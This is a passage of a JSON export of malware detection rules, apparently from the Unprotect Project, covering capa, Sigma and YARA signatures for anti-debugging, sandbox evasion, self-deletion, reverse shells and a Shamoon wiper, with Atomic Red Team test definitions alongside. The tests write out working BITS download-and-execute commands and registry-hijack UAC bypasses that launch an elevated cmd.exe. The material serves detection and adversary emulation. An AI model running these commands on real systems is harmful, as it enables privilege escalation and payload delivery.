            "rule": "rule:\r\n  meta:\r\n    name: check for time delay via GetTickCount\r\n    namespace: anti-analysis/anti-debugging/debugger-detection\r\n    author: michael.hunhoff@fireeye.com\r\n    scope: function\r\n    mbc:\r\n      - Anti-Behavioral Analysis::Debugger Detection::Timing/Delay Check GetTickCount [B0001.032]\r\n    examples:\r\n      - Practical Malware Analysis Lab 16-03.exe_:0x4013d0\r\n  features:\r\n    - and:\r\n      - count(api(kernel32.GetTickCount)): 2 or more"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/3/",
            "name": "hide_copy_melt",
            "rule": "title: Hide copy and delete itself\r\nstatus: experimental\r\ndescription: Hide copy via attrib.exe and delete itself\r\nauthor: Joe Security\r\ndate: 2019-11-12\r\nid: 200025\r\nthreatname:\r\nbehaviorgroup: 1\r\nclassification: 8\r\nmitreattack: \r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*attrib +s +h *timeout /t *del /f /q*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/3/",
            "name": "hide_in_aoppdata",
            "rule": "title: Copy itself to suspicious location via type command \r\nstatus: experimental\r\ndescription: Copy itself to suspicious location via type command\r\nauthor: Joe Security\r\ndate: 2020-02-13\r\nid: 200052\r\nthreatname:\r\nbehaviorgroup: 10\r\nclassification: 1\r\nmitreattack:\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*cmd*type*>*\\AppData*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/3/",
            "name": "kill_process",
            "rule": "title: Kill multiple processes\r\nstatus: experimental\r\ndescription: Kill multiple processes\r\nauthor: Joe Security\r\ndate: 2019-12-30\r\nid: 200039\r\nthreatname:\r\nbehaviorgroup: 18\r\nclassification: 8\r\nmitreattack:\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*cmd*taskkill /f*& taskkill /f*& taskkill /f*& taskkill /f*& taskkill /f*& taskkill /f*& taskkill /f*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
            "name": "kill_process",
            "rule": "rule:\r\n  meta:\r\n    name: reference analysis tools strings\r\n    namespace: anti-analysis\r\n    author: michael.hunhoff@fireeye.com\r\n    scope: file\r\n    mbc:\r\n      - Discovery::Analysis Tool Discovery::Process Detection [B0013.001]\r\n    references:\r\n      - https://github.com/LordNoteworthy/al-khaser/blob/master/al-khaser/AntiAnalysis/process.cpp\r\n    examples:\r\n      - al-khaser_x86.exe_\r\n  features:\r\n    - or:\r\n      - string: /ollydbg.exe/i\r\n      - string: /ProcessHacker.exe/i\r\n      - string: /tcpview.exe/i\r\n      - string: /autoruns.exe/i\r\n      - string: /autorunsc.exe/i\r\n      - string: /filemon.exe/i\r\n      - string: /procmon.exe/i\r\n      - string: /regmon.exe/i\r\n      - string: /procexp.exe/i\r\n      - string: /idaq.exe/i\r\n      - string: /idaq64.exe/i\r\n      - string: /ImmunityDebugger.exe/i\r\n      - string: /Wireshark.exe/i\r\n      - string: /dumpcap.exe/i\r\n      - string: /HookExplorer.exe/i\r\n      - string: /ImportREC.exe/i\r\n      - string: /PETools.exe/i\r\n      - string: /LordPE.exe/i\r\n      - string: /SysInspector.exe/i\r\n      - string: /proc_analyzer.exe/i\r\n      - string: /sysAnalyzer.exe/i\r\n      - string: /sniff_hit.exe/i\r\n      - string: /windbg.exe/i\r\n      - string: /joeboxcontrol.exe/i\r\n      - string: /joeboxserver.exe/i\r\n      - string: /ResourceHacker.exe/i\r\n      - string: /x32dbg.exe/i\r\n      - string: /x64dbg.exe/i\r\n      - string: /Fiddler.exe/i\r\n      - string: /httpdebugger.exe/i\r\n      - string: /fakenet.exe/i\r\n      - string: /netmon.exe/i\r\n      - string: /WPE PRO.exe/i\r\n      - string: /decompile.exe/i"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
            "name": "localsize",
            "rule": "rule:\r\n  meta:\r\n    name: trap debugger with localsize\r\n    namespace: anti-analysis/anti-debugging\r\n    author: lordtmk@protonmail.com\r\n    scope: basic block\r\n    examples:\r\n      - B67E5B1985742F62785122B637EF4FBD:0x4B1F5B\r\n  features:\r\n    - and:\r\n      - api: LocalSize\r\n      - mnemonic: push \r\n      - number: 0"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/3/",
            "name": "lolbins",
            "rule": "attack_technique: T1197\r\ndisplay_name: BITS Jobs\r\natomic_tests:\r\n- name: Bitsadmin Download (cmd)\r\n  auto_generated_guid: 3c73d728-75fb-4180-a12f-6712864d7421\r\n  description: |\r\n    This test simulates an adversary leveraging bitsadmin.exe to download\r\n    and execute a payload\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    remote_file:\r\n      description: Remote file to download\r\n      type: url\r\n      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md\r\n    local_file:\r\n      description: Local file path to save downloaded file\r\n      type: path\r\n      default: '%temp%\\bitsadmin1_flag.ps1'\r\n  executor:\r\n    command: |\r\n      bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file}\r\n    cleanup_command: |\r\n      del #{local_file} >nul 2>&1\r\n    name: command_prompt\r\n- name: Bitsadmin Download (PowerShell)\r\n  auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc\r\n  description: |\r\n    This test simulates an adversary leveraging bitsadmin.exe to download\r\n    and execute a payload leveraging PowerShell\r\n\r\n    Upon execution you will find a github markdown file downloaded to the Temp directory\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    remote_file:\r\n      description: Remote file to download\r\n      type: url\r\n      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md\r\n    local_file:\r\n      description: Local file path to save downloaded file\r\n      type: path\r\n      default: $env:TEMP\\bitsadmin2_flag.ps1\r\n  executor:\r\n    command: |\r\n      Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file}\r\n    cleanup_command: |\r\n      Remove-Item #{local_file} -ErrorAction Ignore\r\n    name: powershell\r\n- name: Persist, Download, & Execute\r\n  auto_generated_guid: 
62a06ec5-5754-47d2-bcfc-123d8314c6ae\r\n  description: |\r\n    This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transfer and execute a payload in multiple steps.\r\n    Note that in this test, the file executed is not the one downloaded. The downloading of a random file is simply the trigger for getting bitsadmin to run an executable.\r\n    This has the interesting side effect of causing the executable (e.g. notepad) to run with an Initiating Process of \"svchost.exe\" and an Initiating Process Command Line of \"svchost.exe -k netsvcs -p -s BITS\"\r\n    This job will remain in the BITS queue until complete or for up to 90 days by default if not removed.\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    command_path:\r\n      description: Path of command to execute\r\n      type: path\r\n      default: C:\\Windows\\system32\\notepad.exe\r\n    bits_job_name:\r\n      description: Name of BITS job\r\n      type: string\r\n      default: AtomicBITS\r\n    local_file:\r\n      description: Local file path to save downloaded file\r\n      type: path\r\n      default: '%temp%\\bitsadmin3_flag.ps1'\r\n    remote_file:\r\n      description: Remote file to download\r\n      type: url\r\n      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md\r\n  executor:\r\n    command: |\r\n      bitsadmin.exe /create #{bits_job_name}\r\n      bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}\r\n      bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} \"\"\r\n      bitsadmin.exe /resume #{bits_job_name}\r\n      timeout 5\r\n      bitsadmin.exe /complete #{bits_job_name}\r\n    cleanup_command: |\r\n      del #{local_file} >nul 2>&1\r\n    name: command_prompt\r\n- name: Bits download using desktopimgdownldr.exe (cmd)\r\n  auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114\r\n  description: |\r\n    This test simulates using desktopimgdownldr.exe to 
download a malicious file\r\n    instead of a desktop or lockscreen background img. The process that actually makes \r\n    the TCP connection and creates the file on the disk is a svchost process (“-k netsvc -p -s BITS”) \r\n    and not desktopimgdownldr.exe. See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    remote_file:\r\n      description: Remote file to download\r\n      type: url\r\n      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md\r\n    download_path:\r\n      description: Local file path to save downloaded file\r\n      type: path\r\n      default: 'SYSTEMROOT=C:\\Windows\\Temp'\r\n    cleanup_path:\r\n      description: path to delete file as part of cleanup_command\r\n      type: path\r\n      default: C:\\Windows\\Temp\\Personalization\\LockScreenImage\r\n    cleanup_file:\r\n      description: file to remove as part of cleanup_command\r\n      type: string\r\n      default: \"*.md\"\r\n  executor:\r\n    command: |\r\n      set \"#{download_path}\" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr\r\n    cleanup_command: |\r\n      del #{cleanup_path}\\#{cleanup_file} >null 2>&1\r\n    name: command_prompt"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
            "name": "mouse_cursor",
            "rule": "rule:\r\n  meta:\r\n    name: check for unmoving mouse cursor\r\n    namespace: anti-analysis/anti-vm/vm-detection\r\n    author: BitsOfBinary\r\n    scope: function\r\n    att&ck:\r\n      - Defense Evasion::Virtualization/Sandbox Evasion::User Activity Based Checks [T1497.002]\r\n    mbc:\r\n      - Anti-Behavioral Analysis::Virtual Machine Detection::Human User Check [B0009.012]\r\n    references:\r\n      - https://www.joesecurity.org/blog/5852460122427342172\r\n    examples:\r\n      - 7E17F0F35D50F49407841372F24FBD38:0x4010f6\r\n  features:\r\n    - and:\r\n      - count(api(user32.GetCursorPos)): 2 or more"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
            "name": "ntglobalflag",
            "rule": "rule:\r\n  meta:\r\n    name: check for PEB NtGlobalFlag flag\r\n    namespace: anti-analysis/anti-debugging/debugger-detection\r\n    author: moritz.raabe@fireeye.com\r\n    scope: function\r\n    mbc:\r\n      - Anti-Behavioral Analysis::Debugger Detection::Process Environment Block NtGlobalFlag [B0001.036]\r\n    references:\r\n      - Practical Malware Analysis, Chapter 16, p. 355\r\n      - https://www.geoffchappell.com/studies/windows/win32/ntdll/structs/peb/index.htm\r\n    examples:\r\n      - Practical Malware Analysis Lab 16-01.exe_:0x403530\r\n  features:\r\n    - and:\r\n      - basic block:\r\n        - and:\r\n          - match: PEB access\r\n          - or:\r\n            - or:\r\n              - offset/x32: 0x68 = PEB.NtGlobalFlag\r\n              - offset/x64: 0xBC = PEB.NtGlobalFlag\r\n            - and:\r\n              - mnemonic: add\r\n              - or:\r\n                - number/x32: 0x68 = PEB.NtGlobalFlag\r\n                - number/x64: 0xBC = PEB.NtGlobalFlag\r\n      - number: 0x70 = (FLG_HEAP_ENABLE_TAIL_CHECK | FLG_HEAP_ENABLE_FREE_CHECK | FLG_HEAP_VALIDATE_PARAMETERS)"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/3/",
            "name": "onset_delay",
            "rule": "title: Powershell delayed execution via ping command\r\nstatus: experimental\r\ndescription: Powershell delayed execution via ping command\r\nauthor: Joe Security\r\ndate: 2020-03-17\r\nid: 200066\r\nthreatname:\r\nbehaviorgroup: 5\r\nclassification: 8\r\nmitreattack:\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*ping -n * & powershell.exe -executionpolicy bypass -noninteractive -windowstyle hidden*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
            "name": "output_debug_string",
            "rule": "rule:\r\n  meta:\r\n    name: check for OutputDebugString error\r\n    namespace: anti-analysis/anti-debugging/debugger-detection\r\n    author: michael.hunhoff@fireeye.com\r\n    scope: function\r\n    mbc:\r\n      - Anti-Behavioral Analysis::Debugger Detection::OutputDebugString [B0001.016]\r\n    examples:\r\n      - Practical Malware Analysis Lab 16-02.exe_:0x401020\r\n  features:\r\n    - and:\r\n      - api: kernel32.SetLastError\r\n      - api: kernel32.GetLastError\r\n      - api: kernel32.OutputDebugString"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/3/",
            "name": "process_reimaging",
            "rule": "action: global\r\ntitle: Defense evasion via process reimaging\r\nid: 7fa4f550-850e-4117-b543-428c86ebb849\r\ndescription: Detects process reimaging defense evasion technique\r\nstatus: experimental\r\nauthor: Alexey Balandin, oscd.community\r\nreferences:\r\n    - https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/in-ntdll-i-trust-process-reimaging-and-endpoint-security-solution-bypass/\r\ntags:\r\n    - attack.defense_evasion\r\ndate: 2019/10/25\r\ndetection:\r\n    condition: all of them\r\nfalsepositives:\r\n    - unknown\r\nlevel: high\r\n---\r\nlogsource:\r\n    product: windows\r\n    service: sysmon\r\ndetection:\r\n    selection1:\r\n        category: process_creation\r\nfields:\r\n    - Image\r\n    - OriginalFileName\r\n    - ParentProcessGuid\r\nnew_fields:\r\n    - ImageFileName\r\n---\r\nlogsource:\r\n    product: windows\r\n    service: sysmon\r\ndetection:\r\n    selection2:\r\n        EventID: 11\r\nfields:\r\n    - ProcessGuid\r\n    - TargetFilename"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
            "name": "QueryPerformanceCounter",
            "rule": "rule:\r\n  meta:\r\n    name: check for time delay via QueryPerformanceCounter\r\n    namespace: anti-analysis/anti-debugging/debugger-detection\r\n    author: michael.hunhoff@fireeye.com\r\n    scope: function\r\n    mbc:\r\n      - Anti-Behavioral Analysis::Debugger Detection::Timing/Delay Check QueryPerformanceCounter [B0001.033]\r\n    examples:\r\n      - Practical Malware Analysis Lab 16-03.exe_:0x4011e0\r\n  features:\r\n    - and:\r\n      - count(api(kernel32.QueryPerformanceCounter)): 2 or more"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
            "name": "sandbox_name",
            "rule": "rule:\r\n  meta:\r\n    name: check for sandbox username\r\n    namespace: anti-analysis/anti-vm/vm-detection\r\n    author: \"@_re_fox\"\r\n    scope: function\r\n    mbc:\r\n      - Anti-Behavioral Analysis::Virtual Machine Detection [B0009]\r\n    examples:\r\n      - ccbf7cba35bab56563c0fbe4237fdc41:0x402B90\r\n    references:\r\n      - https://github.com/LloydLabs/wsb-detect\r\n  features:\r\n    - and:\r\n      - api: GetUserName\r\n      - or:\r\n        - string: /MALTEST/i\r\n          description: Betabot Username Check\r\n        - string: /TEQUILABOOMBOOM/i\r\n          description: VirusTotal Sandbox\r\n        - string: /SANDBOX/i\r\n          description: Gookit Username Check\r\n        - string: /^VIRUS/i\r\n          description: Satan Username Check\r\n        - string: /MALWARE/i\r\n          description: Betabot Username Check\r\n        - string: /SAND\\sBOX/i\r\n          description: Betabot Username Check\r\n        - string: /Test\\sUser/i\r\n          description: Betabot Username Check\r\n        - string: /CurrentUser/i\r\n          description: Gookit Username Check\r\n        - string: /7SILVIA/i\r\n          description: Gookit Username Check\r\n        - string: /FORTINET/i\r\n          description: Shifu Username Check\r\n        - string: /John\\sDoe/i\r\n          description: Emotet Username Check\r\n        - string: /Emily/i\r\n          description: Trickbot Downloader Username Check\r\n        - string: /HANSPETER\\-PC/i\r\n          description: Trickbot Downloader Username Check\r\n        - string: /HAPUBWS/i\r\n          description: Trickbot Downloader Username Check\r\n        - string: /Hong\\sLee/i\r\n          description: Trickbot Downloader Username Check\r\n        - string: /IT\\-ADMIN/i\r\n          description: Trickbot Downloader Username Check\r\n        - string: /JOHN\\-PC/i\r\n          description: Trickbot Downloader Username Check\r\n        - string: /Johnson/i\r\n          
description: Trickbot Downloader Username Check\r\n        - string: /Miller/i\r\n          description: Trickbot Downloader Username Check\r\n        - string: /MUELLER\\-PC/i\r\n          description: Trickbot Downloader Username Check\r\n        - string: /Peter\\sWilson/i\r\n          description: Trickbot Downloader Username Check\r\n        - string: /SystemIT/i\r\n          description: Trickbot Downloader Username Check\r\n        - string: /Timmy/i\r\n          description: Trickbot Downloader Username Check\r\n        - string: /WIN7\\-TRAPS/i\r\n          description: Trickbot Downloader Username Check\r\n        - string: /WDAGUtilityAccount/i\r\n          description: Windows Defender Application Guard"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
            "name": "SetHandleInformation",
            "rule": "rule:\r\n  meta:\r\n    name: check for protected handle exception\r\n    namespace: anti-analysis/anti-debugging/debugger-detection\r\n    author: michael.hunhoff@fireeye.com\r\n    scope: function\r\n    mbc:\r\n      - Anti-Behavioral Analysis::Debugger Detection::SetHandleInformation [B0001.024]\r\n    references:\r\n      - https://github.com/LordNoteworthy/al-khaser/blob/master/al-khaser/AntiDebug/SetHandleInformation_API.cpp\r\n    examples:\r\n      - al-khaser_x86.exe_:0x430D20\r\n  features:\r\n    - and:\r\n      - basic block:\r\n        - and:\r\n          - count(number(2)): 2 or more\r\n          - api: SetHandleInformation\r\n      - api: CloseHandle"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/1/",
            "name": "Shamoon_Wiper",
            "rule": "import \"pe\"\r\n\r\nrule Shamoon2_Wiper {\r\n   meta:\r\n      description = \"Detects Shamoon 2.0 Wiper Component\"\r\n      author = \"Florian Roth\"\r\n      reference = \"https://goo.gl/jKIfGB\"\r\n      date = \"2016-12-01\"\r\n      score = 70\r\n      hash1 = \"c7fc1f9c2bed748b50a599ee2fa609eb7c9ddaeb9cd16633ba0d10cf66891d8a\"\r\n      hash2 = \"128fa5815c6fee68463b18051c1a1ccdf28c599ce321691686b1efa4838a2acd\"\r\n   strings:\r\n      $a1 = \"\\\\??\\\\%s\\\\System32\\\\%s.exe\" fullword wide\r\n      $x1 = \"IWHBWWHVCIDBRAFUASIIWURRTWRTIBIVJDGWTRRREFDEAEBIAEBJGGCSVUHGVJUHADIEWAFGWADRUWDTJBHTSITDVVBCIDCWHRHVTDVCDESTHWSUAEHGTWTJWFIRTBRB\" wide\r\n      $s1 = \"UFWYNYNTS\" fullword wide\r\n      $s2 = \"\\\\\\\\?\\\\ElRawDisk\" fullword wide\r\n   condition:\r\n      ( uint16(0) == 0x5a4d and filesize < 1000KB and 2 of them ) or ( 3 of them )\r\n}\r\n\r\nrule EldoS_RawDisk {\r\n   meta:\r\n      description = \"EldoS Rawdisk Device Driver (Commercial raw disk access driver - used in Operation Shamoon 2.0)\"\r\n      author = \"Florian Roth (with Binar.ly)\"\r\n      reference = \"https://goo.gl/jKIfGB\"\r\n      date = \"2016-12-01\"\r\n      score = 50\r\n      hash1 = \"47bb36cd2832a18b5ae951cf5a7d44fba6d8f5dca0a372392d40f51d1fe1ac34\"\r\n      hash2 = \"394a7ebad5dfc13d6c75945a61063470dc3b68f7a207613b79ef000e1990909b\"\r\n   strings:\r\n      $s1 = \"g\\\\system32\\\\\" fullword wide\r\n      $s2 = \"ztvttw\" fullword wide\r\n      $s3 = \"lwizvm\" fullword ascii\r\n      $s4 = \"FEJIKC\" fullword ascii\r\n      $s5 = \"INZQND\" fullword ascii\r\n      $s6 = \"IUTLOM\" fullword wide\r\n      $s7 = \"DKFKCK\" fullword ascii\r\n\r\n      $op1 = { 94 35 77 73 03 40 eb e9 }\r\n      $op2 = { 80 7c 41 01 00 74 0a 3d }\r\n      $op3 = { 74 0a 3d 00 94 35 77 }\r\n   condition:\r\n      ( uint16(0) == 0x5a4d and filesize < 2000KB and 4 of them )\r\n}"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/3/",
            "name": "spoofed_extension",
            "rule": "title: Execute DLL with spoofed extension\r\nstatus: experimental\r\ndescription: Execute DLL with spoofed extension\r\nauthor: Joe Security\r\ndate: 2020-03-24\r\nid: 200068\r\nthreatname:\r\nbehaviorgroup: 1\r\nclassification: 8\r\nmitreattack:\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*rundll32*.html,DllRegisterServer*'\r\n              - '*rundll32*.htm,DllRegisterServer*'\r\n              - '*rundll32*.txt,DllRegisterServer*'\r\n              - '*rundll32*.png,DllRegisterServer*'\r\n              - '*rundll32*.jpeg,DllRegisterServer*'\r\n              - '*rundll32*.jpg,DllRegisterServer*'\r\n              - '*regsvr32 c:\\programdata\\\\*.pdf*'\r\n              - '*regsvr32 c:\\programdata\\\\*.txt*'\r\n              - '*regsvr32 c:\\users\\public\\\\*.pdf*'\r\n              - '*regsvr32 c:\\users\\public\\\\*.txt*'\r\n              \r\n      condition: selection\r\nlevel: critical"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
            "name": "stackstring_obf",
            "rule": "rule:\r\n  meta:\r\n    name: contain obfuscated stackstrings\r\n    namespace: anti-analysis/obfuscation/string/stackstring\r\n    author: moritz.raabe@fireeye.com\r\n    scope: basic block\r\n    att&ck:\r\n      - Defense Evasion::Obfuscated Files or Information [T1027]\r\n    mbc:\r\n      - Anti-Static Analysis::Disassembler Evasion::Argument Obfuscation [B0012.001]\r\n    examples:\r\n      - Practical Malware Analysis Lab 16-03.exe_:0x4013D0\r\n  features:\r\n    - characteristic: stack string"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/3/",
            "name": "stop_service",
            "rule": "title: Stop multiple services\r\nstatus: experimental\r\ndescription: Stop multiple services\r\nauthor: Joe Security\r\ndate: 2019-12-30\r\nid: 200040\r\nthreatname:\r\nbehaviorgroup: 18\r\nclassification: 8\r\nmitreattack:\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*cmd*net stop*& net stop*& net stop*& net stop*& net stop*& net stop*& net stop*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
            "name": "test",
            "rule": "rule:\r\n  meta:\r\n    name: create reverse shell\r\n    namespace: c2/shell\r\n    author: moritz.raabe@fireeye.com\r\n    scope: function\r\n    att&ck:\r\n      - Execution::Command and Scripting Interpreter::Windows Command Shell [T1059.003]\r\n    mbc:\r\n      - Impact::Remote Access::Reverse Shell [B0022.001]\r\n    examples:\r\n      - C91887D861D9BD4A5872249B641BC9F9:0x401A77\r\n  features:\r\n    - or:\r\n      - and:\r\n        - match: create pipe\r\n        - api: kernel32.PeekNamedPipe\r\n        - api: kernel32.CreateProcess\r\n        - api: kernel32.ReadFile\r\n        - api: kernel32.WriteFile\r\n      - and:\r\n        - match: create process\r\n        - match: read pipe\r\n        - match: write pipe\r\n      - and:\r\n        - match: create pipe\r\n        - match: create process\r\n        - basic block:\r\n          - and:\r\n            - count(api(SetHandleInformation)): 2 or more\r\n            - number: 1 = HANDLE_FLAG_INHERIT"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
            "name": "timestomp",
            "rule": "rule:\r\n  meta:\r\n    name: timestomp file\r\n    namespace: anti-analysis/anti-forensic/timestomp\r\n    author: moritz.raabe@fireeye.com\r\n    scope: function\r\n    att&ck:\r\n      - Defense Evasion::Indicator Removal on Host::Timestomp [T1070.006]\r\n    examples:\r\n      - Practical Malware Analysis Lab 03-04.exe_:0x4014e0\r\n  features:\r\n    - and:\r\n      - or:\r\n        - api: kernel32.GetSystemTime\r\n        - api: kernel32.FileTimeToLocalFileTime\r\n        - api: kernel32.GetSystemTimeAsFileTime\r\n        - api: kernel32.SystemTimeToFileTime\r\n        - api: kernel32.GetFileTime\r\n      - api: kernel32.SetFileTime"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/3/",
            "name": "uac_bypass",
            "rule": "title: Fodhelper UAC Bypass\r\nstatus: experimental\r\ndescription: Fodhelper UAC Bypass\r\nauthor: Joe Security\r\ndate: 2020-07-30\r\nid: 200082\r\nthreatname:\r\nbehaviorgroup: 26\r\nclassification: 7\r\nmitreattack:\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*reg add*hkcu\\software\\classes\\ms-settings\\shell\\open\\command*'\r\n      condition: selection\r\nlevel: critical\r\nattack_technique: T1548.002\r\ndisplay_name: 'Abuse Elevation Control Mechanism: Bypass User Access Control'\r\natomic_tests:\r\n- name: Bypass UAC using Event Viewer (cmd)\r\n  auto_generated_guid: 5073adf8-9a50-4bd9-b298-a9bd2ead8af9\r\n  description: |\r\n    Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/\r\n    Upon execution command prompt should be launched with administrative privileges\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    executable_binary:\r\n      description: Binary to execute with UAC Bypass\r\n      type: path\r\n      default: C:\\Windows\\System32\\cmd.exe\r\n  executor:\r\n    command: |\r\n      reg.exe add hkcu\\software\\classes\\mscfile\\shell\\open\\command /ve /d \"#{executable_binary}\" /f\r\n      cmd.exe /c eventvwr.msc\r\n    cleanup_command: |\r\n      reg.exe delete hkcu\\software\\classes\\mscfile /f >nul 2>&1\r\n    name: command_prompt\r\n- name: Bypass UAC using Event Viewer (PowerShell)\r\n  auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b\r\n  description: |\r\n    PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. 
More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/\r\n    Upon execution command prompt should be launched with administrative privileges\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    executable_binary:\r\n      description: Binary to execute with UAC Bypass\r\n      type: path\r\n      default: C:\\Windows\\System32\\cmd.exe\r\n  executor:\r\n    command: |\r\n      New-Item \"HKCU:\\software\\classes\\mscfile\\shell\\open\\command\" -Force\r\n      Set-ItemProperty \"HKCU:\\software\\classes\\mscfile\\shell\\open\\command\" -Name \"(default)\" -Value \"#{executable_binary}\" -Force\r\n      Start-Process \"C:\\Windows\\System32\\eventvwr.msc\"\r\n    cleanup_command: |\r\n      Remove-Item \"HKCU:\\software\\classes\\mscfile\" -force -Recurse -ErrorAction Ignore\r\n    name: powershell\r\n- name: Bypass UAC using Fodhelper\r\n  auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182\r\n  description: |\r\n    Bypasses User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). 
Requires Windows 10.\r\n    Upon execution, \"The operation completed successfully.\" will be shown twice and command prompt will be opened.\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    executable_binary:\r\n      description: Binary to execute with UAC Bypass\r\n      type: path\r\n      default: C:\\Windows\\System32\\cmd.exe\r\n  executor:\r\n    command: |\r\n      reg.exe add hkcu\\software\\classes\\ms-settings\\shell\\open\\command /ve /d \"#{executable_binary}\" /f\r\n      reg.exe add hkcu\\software\\classes\\ms-settings\\shell\\open\\command /v \"DelegateExecute\" /f\r\n      fodhelper.exe\r\n    cleanup_command: |\r\n      reg.exe delete hkcu\\software\\classes\\ms-settings /f >nul 2>&1\r\n    name: command_prompt\r\n- name: Bypass UAC using Fodhelper - PowerShell\r\n  auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa\r\n  description: |\r\n    PowerShell code to bypass User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). 
Requires Windows 10.\r\n    Upon execution command prompt will be opened.\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    executable_binary:\r\n      description: Binary to execute with UAC Bypass\r\n      type: path\r\n      default: C:\\Windows\\System32\\cmd.exe\r\n  executor:\r\n    command: |\r\n      New-Item \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Force\r\n      New-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"DelegateExecute\" -Value \"\" -Force\r\n      Set-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"(default)\" -Value \"#{executable_binary}\" -Force\r\n      Start-Process \"C:\\Windows\\System32\\fodhelper.exe\"\r\n    cleanup_command: |\r\n      Remove-Item \"HKCU:\\software\\classes\\ms-settings\" -force -Recurse -ErrorAction Ignore\r\n    name: powershell\r\n- name: Bypass UAC using ComputerDefaults (PowerShell)\r\n  auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f\r\n  description: |\r\n    PowerShell code to bypass User Account Control using ComputerDefaults.exe on Windows 10\r\n    Upon execution administrative command prompt should open\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    executable_binary:\r\n      description: Binary to execute with UAC Bypass\r\n      type: path\r\n      default: C:\\Windows\\System32\\cmd.exe\r\n  executor:\r\n    command: |\r\n      New-Item \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Force\r\n      New-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"DelegateExecute\" -Value \"\" -Force\r\n      Set-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"(default)\" -Value \"#{executable_binary}\" -Force\r\n      Start-Process \"C:\\Windows\\System32\\ComputerDefaults.exe\"\r\n    cleanup_command: |\r\n      Remove-Item \"HKCU:\\software\\classes\\ms-settings\" -force 
